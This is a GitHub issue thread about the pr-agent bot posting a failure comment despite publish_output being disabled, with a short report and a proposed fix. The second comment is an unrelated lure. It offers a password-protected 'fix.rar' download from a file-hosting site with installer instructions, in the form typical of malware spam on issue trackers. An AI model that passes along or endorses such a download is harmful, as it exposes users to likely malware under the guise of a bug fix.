### ISSUE TITLE
PR bot publishing failure comment when it shouldn't

### ISSUE THREAD

**Issue by MaxHoecker** [Codium-ai/pr-agent#1180]
Currently we have the bot configured to set publish_output = false, however when the bot intermittently throws an exception it will still comment in the PR "Failed to generate code suggestions for PR"

I'll make a PR to add a publish_output check in the following exception block which seems to only be a problem for the code_suggestions tool. https://github.com/Codium-ai/pr-agent/blob/main/pr_agent/tools/pr_code_suggestions.py#L174-L178

**Comment by Viotemis** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mrT23** [comment]
👍
